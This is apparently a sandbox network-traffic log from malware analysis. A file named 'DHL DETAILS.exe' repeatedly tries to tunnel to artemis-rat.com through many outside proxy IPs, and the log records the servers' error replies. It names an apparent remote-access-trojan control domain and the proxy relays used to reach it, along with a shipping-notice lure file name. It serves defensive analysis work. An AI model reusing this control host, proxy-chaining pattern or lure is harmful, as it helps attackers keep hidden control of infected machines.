Mar 9, 2024 13:14:17.551847935 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.706331968 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:17 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1173	192.168.2.5	53457	51.15.247.93	16379	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.555135012 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1174	192.168.2.5	53525	104.18.136.28	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.559185982 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.713515997 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:17 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1175	192.168.2.5	53513	74.48.7.43	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.560137987 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1176	192.168.2.5	53455	45.118.132.180	45449	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.562392950 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1177	192.168.2.5	51617	109.87.130.6	5678	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.566019058 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1178	192.168.2.5	53479	181.78.74.78	999	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.644366026 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.917359114 CET	19	IN	HTTP/1.1 200 OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1179	192.168.2.5	53552	104.20.75.31	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.644515991 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.798582077 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:17 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1180	192.168.2.5	53553	104.27.37.131	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.644830942 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.799024105 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:17 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1181	192.168.2.5	53556	185.162.228.128	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.645190001 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.799530983 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:17 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1182	192.168.2.5	53025	98.162.25.7	31653	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.645365953 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1183	192.168.2.5	53561	104.20.51.99	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.648065090 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.802289963 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:17 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1184	192.168.2.5	53320	72.49.49.11	31034	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.648610115 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1185	192.168.2.5	53557	162.159.242.159	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.648895025 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.810034037 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:17 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1186	192.168.2.5	51595	91.134.140.160	12217	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.653218985 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.130011082 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.723995924 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.724106073 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.520968914 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1187	192.168.2.5	53459	145.239.199.241	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.653280973 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.962383986 CET	325	IN	HTTP/1.1 400 Bad Request Server: nginx/1.14.2 Date: Sat, 09 Mar 2024 12:14:17 GMT Content-Type: text/html Content-Length: 173 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.2</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1188	192.168.2.5	53469	60.188.102.225	18080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.653763056 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1189	192.168.2.5	53512	3.21.101.158	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.653769970 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.870390892 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:17 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1190	192.168.2.5	53481	91.107.180.250	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.654639959 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1191	192.168.2.5	53523	206.220.175.2	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.654807091 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1192	192.168.2.5	53120	171.244.140.160	34559	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.654827118 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.723980904 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:23.724174023 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.833566904 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1193	192.168.2.5	53488	51.75.125.208	27029	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.656162024 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1194	192.168.2.5	53468	81.250.223.126	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.656162024 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.967299938 CET	805	IN	HTTP/1.1 500 Internal Server Error Date: Sat, 09 Mar 2024 12:14:17 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 613 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1195	192.168.2.5	53582	104.19.171.188	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.657176971 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.811680079 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:17 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1196	192.168.2.5	53531	135.148.10.161	41146	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.657327890 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.333241940 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
